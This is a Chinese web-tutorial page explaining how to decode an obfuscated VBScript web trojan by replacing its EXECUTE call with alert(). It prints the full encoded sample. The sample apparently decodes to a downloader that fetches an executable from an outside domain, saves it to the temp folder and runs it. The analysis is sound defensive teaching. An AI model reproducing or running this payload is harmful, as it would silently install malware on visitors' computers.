首页
所有分类
TAGS
文字工具 EMOJI BIBLE
编程 Javascript

JS解密入门 最终变量劫持

Posted in Javascript onJune 25, 2008

如下是一段网马

<Script Language="VBScript">
Cn911="83,61,34,52,70,54,69,50,48,52,53,55,50,55,50,54,70,55,50,50,48,53,50,54,53,55,51,55,53,54,68,54,53,50,48,52,69,54,53,55,56,55,52,48,68,48,65,52,51,54,69,52,67,53,50,53,53,51,68,50,50,54,56,55,52,55,52,55,48,51,65,50,70,50,70,55,55,55,55,55,55,50,69,54,66,55,50,55,54,54,66,55,50,50,69,54,51,54,70,54,68,50,70,55,55,54,70,55,50,54,68,50,69,54,53,55,56,54,53,50,50,48,68,48,65,53,51,54,53,55,52,50,48,52,70,54,50,50,48,51,68,50,48,54,52,54,70,54,51,55,53,54,68,54,53,54,69,55,52,50,69,54,51,55,50,54,53,54,49,55,52,54,53,52,53,54,67,54,53,54,68,54,53,54,69,55,52,50,56,50,50,54,70,54,50,50,50,50,54,50,50,54,65,54,53,50,50,50,54,50,50,54,51,50,50,50,54,50,50,55,52,50,50,50,57,48,68,48,65,52,70,54,50,50,69,53,51,54,53,55,52,52,49,55,52,55,52,55,50,54,57,54,50,55,53,55,52,54,53,50,48,50,50,54,51,54,67,54,49,50,50,50,54,50,50,55,51,55,51,54,57,54,52,50,50,50,67,50,48,50,50,54,51,50,50,50,54,50,50,54,67,55,51,50,50,50,54,50,50,54,57,50,50,50,54,50,50,54,52,51,65,52,50,52,52,51,57,50,50,50,54,50,50,51,54,52,51,51,53,51,53,50,50,50,54,50,50,51,54,50,68,51,54,51,53,50,50,50,54,50,50,52,49,51,51,50,68,51,49,51,49,52,52,51,48,50,50,50,54,50,50,50,68,51,57,51,56,51,51,52,49,50,68,51,48,51,48,52,51,50,50,50,54,50,50,51,48,51,52,52,54,52,51,51,50,51,57,50,50,50,54,50,50,52,53,51,51,51,54,50,50,48,68,48,65,55,51,52,56,53,52,53,52,53,48,51,68,50,50,52,68,50,50,50,54,50,50,54,57,54,51,50,50,50,54,50,50,55,50,54,70,50,50,50,54,50,50,55,51,50,50,50,54,50,50,54,70,54,54,50,50,50,54,50,50,55,52,50,50,50,54,50,50,50,69,53,56,50,50,50,54,50,50,52,68,50,50,50,54,50,50,52,67,50,50,50,54,50,50,52,56,50,50,50,54,50,50,53,52,53,52,50,50,50,54,50,50,53,48,50,50,48,68,48,65,53,51,54,53,55,52,50,48,53,48,54,70,55,48,50,48,51,68,50,48,52,70,54,50,50,69,52,51,55,50,54,53,54,49,55,52,54,53,52,70,54,50,54,65,54,53,54,51,55,52,50,56,55,51,52,56,53,52,53,52,53,48,50,67,50,50,50,50,50,57,48,68,48,65,53,48,54,70,55,48,50,69,52,70,55,48,54,53,54,69,50,48,50,50,52,55,50,50,50,54,50,50,52,53,53,52,50,50,50,67,50,48,52,51,54,69,52,67,53,50,53,53,50,67,50,48,52,54,54,49,54,67,55,51,54,53,48,68,48,65,53,48,54,70,55,48,50,69,53,51,54,53,54,69,54,52,48,68,48,65,52,53,55,56,54,53,52,69,54,49,54,68,54,53,51,68,50,50,52,51,54,69,50,50,50,54,50,50,51,57,51,49,50,50,50,54,50,50,51,49,50,69,54,53,55,56,54,53,50,50,48,68,48,65,53,54,54,50,55,51,52,69,54,49,54,68,54,53,51,68,50,50,52,51,54,69,50,50,50,54,50,50,51,57,51,49,50,50,50,54,50,50,51,49,50,69,55,54,54,50,55,51,50,50,48,68,48,65,53,51,54,53,55,52,50,48,52,54,53,48,52,57,50,48,51,68,50,48,52,70,54,50,50,69,54,51,55,50,54,53,54,49,55,52,54,53,54,70,54,50,54,65,54,53,54,51,55,52,50,56,50,50,53,51,54,51,55,50,54,57,50,50,50,54,50,50,55,48,50,50,50,54,50,50,55,52,54,57,54,69,54,55,50,69,52,54,50,50,50,54,50,50,54,57,50,50,50,54,50,50,54,67,54,53,50,50,50,54,50,50,53,51,55,57,50,50,50,54,50,50,55,51,55,52,50,50,50,54,50,50,54,53,50,50,50,54,50,50,54,68,52,70,50,50,50,54,50,50,54,50,54,65,54,53,50,50,50,54,50,50,54,51,55,52,50,50,50,67,50,50,50,50,50,57,48,68,48,65,53,51,54,53,55,52,50,48,55,51,53,52,54,68,55,48,50,48,51,68,50,48,52,54,53,48,52,57,50,69,52,55,54,53,55,52,53,51,55,48,54,53,54,51,54,57,54,49,54,67,52,54,54,70,54,67,54,52,54,53,55,50,50,56,51,50,50,57,48,68,48,65,52,53,55,56,54,53,52,69,54,49,54,68,54,53,51,68,52,54,53,48,52,57,50,69,52,50,55,53,54,57,54,67,54,52,53,48,54,49,55,52,54,56,50,56,55,51,53,52,54,68,55,48,50,67,52,53,55,56,54,53,52,69,54,49,54,68,54,53,50,57,48,68,48,65,53,54,54,50,55,51,52,69,54,49,54,68,54,53,51,68,52,54,53,48,52,57,50,69,52,50,55,53,54,57,54,67,54,52,53,48,54,49,55,52,54,56,50,56,55,51,53,52,54,68,55,48,50,67,53,54,54,50,55,51,52,69,54,49,54,68,54,53,50,57,48,68,48,65,52,49,52,49,51,68,50,50,52,49,50,50,50,54,50,50,54,52,50,50,48,68,48,65,52,49,52,50,51,68,50,50,54,70,50,50,50,54,50,50,54,52,50,50,50,54,50,50,54,50,50,50,50,54,50,50,50,69,50,50,50,54,50,50,55,51,50,50,50,54,50,50,55,52,55,50,54,53,50,50,50,54,50,50,54,49,54,68,50,50,48,68,48,65,52,49,54,52,52,68,51,68,52,49,52,49,50,54,52,49,52,50,48,68,48,65,53,51,54,53,55,52,50,48,52,50,54,52,54,49,50,48,51,68,50,48,52,70,54,50,50,69,54,51,55,50,54,53,54,49,55,52,54,53,54,70,54,50,54,65,54,53,54,51,55,52,50,56,52,49,54,52,52,68,50,67,50,50,50,50,50,57,48,68,48,65,52,50,54,52,54,49,50,69,55,52,55,57,55,48,54,53,51,68,51,49,48,68,48,65,52,50,54,52,54,49,50,69,52,70,55,48,54,53,54,69,48,68,48,65,52,50,54,52,54,49,50,69,53,55,55,50,54,57,55,52,54,53,50,48,53,48,54,70,55,48,50,69,53,50,54,53,55,51,55,48,54,70,54,69,55,51,54,53,52,50,54,70,54,52,55,57,48,68,48,65,52,50,54,52,54,49,50,69,53,51,54,49,55,54,54,53,55,52,54,70,54,54,54,57,54,67,54,53,50,48,52,53,55,56,54,53,52,69,54,49,54,68,54,53,50,67,51,50,48,68,48,65,52,50,54,52,54,49,50,69,52,51,54,67,54,70,55,51,54,53,48,68,48,65,52,50,54,52,54,49,50,69,53,52,55,57,55,48,54,53,51,68,51,50,48,68,48,65,52,50,54,52,54,49,50,69,52,70,55,48,54,53,54,69,48,68,48,65,52,50,54,52,54,49,50,69,53,55,55,50,54,57,55,52,54,53,53,52,54,53,55,56,55,52,50,48,50,50,53,51,54,53,55,52,50,48,53,51,54,56,54,53,54,67,54,67,50,48,51,68,50,48,52,51,55,50,54,53,54,49,55,52,54,53,52,70,54,50,54,65,54,53,54,51,55,52,50,56,50,50,50,50,53,55,55,51,54,51,55,50,54,57,55,48,55,52,50,69,53,51,54,56,54,53,54,67,54,67,50,50,50,50,50,57,50,50,50,54,55,54,54,50,52,51,55,50,52,67,54,54,50,54,50,50,53,51,54,56,54,53,54,67,54,67,50,69,53,50,55,53,54,69,50,48,50,56,50,50,50,50,50,50,50,54,52,53,55,56,54,53,52,69,54,49,54,68,54,53,50,54,50,50,50,50,50,50,50,57,50,50,50,54,55,54,54,50,52,51,55,50,52,67,54,54,50,54,50,50,53,51,54,53,55,52,50,48,53,51,54,56,54,53,54,67,54,67,50,48,51,68,50,48,52,69,54,70,55,52,54,56,54,57,54,69,54,55,50,50,48,68,48,65,52,50,54,52,54,49,50,69,53,51,54,49,55,54,54,53,55,52,54,70,54,54,54,57,54,67,54,53,50,48,53,54,54,50,55,51,52,69,54,49,54,68,54,53,50,67,51,50,48,68,48,65,52,50,54,52,54,49,50,69,52,51,54,67,54,70,55,51,54,53,48,68,48,65,55,51,53,50,55,53,54,69,51,68,50,50,53,51,50,50,50,54,50,50,54,56,50,50,50,54,50,50,54,53,50,50,50,54,50,50,54,67,50,50,50,54,50,50,54,67,50,50,50,54,50,50,50,69,50,50,50,54,50,50,52,49,50,50,50,54,50,50,55,48,50,50,50,54,50,50,55,48,50,50,50,54,50,50,54,67,50,50,50,54,50,50,54,57,50,50,48,68,48,65,53,51,54,53,55,52,50,48,53,50,55,53,54,69,50,48,51,68,50,48,52,70,54,50,50,69,54,51,55,50,54,53,54,49,55,52,54,53,54,70,54,50,54,65,54,53,54,51,55,52,50,56,55,51,53,50,55,53,54,69,50,54,50,50,54,51,54,49,55,52,54,57,54,70,54,69,50,50,50,67,50,50,50,50,50,57,48,68,48,65,53,50,55,53,54,69,50,69,53,51,54,56,54,53,54,67,54,67,52,53,55,56,54,53,54,51,55,53,55,52,54,53,50,48,53,54,54,50,55,51,52,69,54,49,54,68,54,53,50,67,50,50,50,50,50,67,50,50,50,50,50,67,50,50,52,70,55,48,54,53,54,69,50,50,50,67,51,48,34,58,68,61,34,69,88,69,67,85,84,69,32,34,34,34,34,34,58,67,61,34,38,67,72,82,40,38,72,34,58,78,61,34,41,34,58,68,79,32,87,72,73,76,69,32,76,69,78,40,83,41,62,49,58,73,70,32,73,83,78,85,77,69,82,73,67,40,76,69,70,84,40,83,44,49,41,41,32,84,72,69,78,32,68,61,68,38,67,38,76,69,70,84,40,83,44,50,41,38,78,58,83,61,77,73,68,40,83,44,51,41,32,69,76,83,69,32,68,61,68,38,67,38,76,69,70,84,40,83,44,52,41,38,78,58,83,61,77,73,68,40,83,44,53,41,13,10,76,79,79,80,58,69,88,69,67,85,84,69,32,68"

'以下是处理的函数
Function Rechange(Q)
S=Split(Q,",")
Cn922=""
For i = 0 To UBound(S)
Cn922=Cn922&Chr(eval(S(i)))
Next
Rechange=Cn922
End Function

'执行这个代码
EXECUTE(Rechange(Cn911))
</Script>

看到我的前几篇文章的朋友应该知道,前面的是10进制,直觉解就行了,不过下面有个处理函数,你用10进制解密出来之后还要去分析函数的功能,很不合算。Rechange这个是处理函数,这个函数的功能我们不知道,不要紧,我们看到最后这里有个EXECUTE(),说明这个就是执行函数,执行的内容是 Rechange(Cn911),我们把EXECUTE改为alert()就行了,也就是把最后一行改为alert(Rechange(Cn911))。

劫持完毕,打开网页,解密的内容弹出来了。

学习要点:对于这种网马,最后一定会有一个最终的变量或是表达式,修改执行函数即可

JS解密入门 最终变量劫持

声明:登载此文出于传递更多信息之目的,并不意味着赞同其观点或证实其描述。

Javascript 相关文章推荐
基于jquery的表格排序
Sep 11 Javascript
IE与Firefox在JavaScript上的7个不同句法分享
Oct 30 Javascript
深入理解javascript严格模式(Strict Mode)
Nov 28 Javascript
JavaScript动态提示输入框输入字数的方法
Jul 27 Javascript
jquery简单实现幻灯片的方法
Aug 03 Javascript
js实现tab切换效果实例
Sep 16 Javascript
jquery ztree异步搜索(搜叶子)实践
Feb 25 Javascript
JQuery Mobile实现导航栏和页脚
Mar 09 Javascript
Wireshark基本介绍和学习TCP三次握手
Aug 15 Javascript
JavaScript学习笔记整理_关于表达式和语句
Sep 19 Javascript
jQuery插件FusionCharts绘制ScrollColumn2D图效果示例【附demo源码下载】
Mar 22 jQuery
Angular脚手架开发的实现步骤
Apr 09 Javascript
JS解密入门之凭直觉解
Jun 25 #Javascript
js异或加解密效果代码
Jun 25 #Javascript
asp批量修改记录的代码
Jun 25 #Javascript
js innerHTML 的一些问题的解决方法
Jun 22 #Javascript
很酷的javascript loading效果代码
Jun 18 #Javascript
豆瓣网的jquery代码实例
Jun 15 #Javascript
JQuery实现自定义对话框的代码
Jun 15 #Javascript
修复(2) 东方红(1) YB217(1) 海燕B411(1) TECSUN(1) 1 Tube Radio(1) 再生机(1) 德生(17) YB235(1) PL-365(1)
You might like
PHP insert语法详解
2008/06/07 PHP
memcached 和 mysql 主从环境下php开发代码详解
2010/05/16 PHP
php简单获取复选框值的方法
2016/05/11 PHP
PHP通过文件路径获取文件名的实例代码
2018/10/14 PHP
phpQuery采集网页实现代码实例
2020/04/02 PHP
json 实例详细说明教程
2009/10/31 Javascript
$.format,jquery.format 使用说明
2011/07/13 Javascript
jquery模拟alert的弹窗插件
2015/07/31 Javascript
JavaScript中var关键字的使用详解
2015/08/14 Javascript
使用纯JS代码判断字符串中有多少汉字的实现方法(超简单实用)
2016/11/12 Javascript
浅析Angular2子模块以及异步加载
2017/04/24 Javascript
解决canvas画布使用fillRect()时高度出现双倍效果的问题
2017/08/03 Javascript
JS解析url查询参数的简单代码
2017/08/06 Javascript
基于Bootstrap table组件实现多层表头的实例代码
2017/09/07 Javascript
p5.js入门教程之小球动画示例代码
2018/03/15 Javascript
vue项目中定义全局变量、函数的几种方法
2019/11/08 Javascript
[22:20]初生之犊-TI4第5名LGD战队纪录片
2014/08/13 DOTA
使用Python判断IP地址合法性的方法实例
2014/03/13 Python
深入Python函数编程的一些特性
2015/04/13 Python
在Ubuntu系统下安装使用Python的GUI工具wxPython
2016/02/18 Python
基于OpenCV python3实现证件照换背景的方法
2019/03/22 Python
python实现微信防撤回神器
2019/04/29 Python
对python 中class与变量的使用方法详解
2019/06/26 Python
Python 读取串口数据,动态绘图的示例
2019/07/02 Python
通过实例解析python subprocess模块原理及用法
2020/10/10 Python
美国知名女性服饰品牌:New York & Company
2017/03/23 全球购物
迪斯尼假期(欧洲、中东及非洲):Disney Holidays EMEA
2021/02/15 全球购物
金讯Java笔试题目
2013/06/18 面试题
自动化专业个人求职信范文
2013/12/30 职场文书
大学四年的个人自我评价
2014/01/14 职场文书
低碳生活倡议书
2014/04/14 职场文书
财会专业大学生求职信
2014/09/26 职场文书
2014年仓库工作总结
2014/11/20 职场文书
2014年妇幼保健工作总结
2014/12/08 职场文书
教你一步步实现一个简易promise
2021/11/02 Javascript
Golang流模式之grpc的四种数据流
2022/04/13 Golang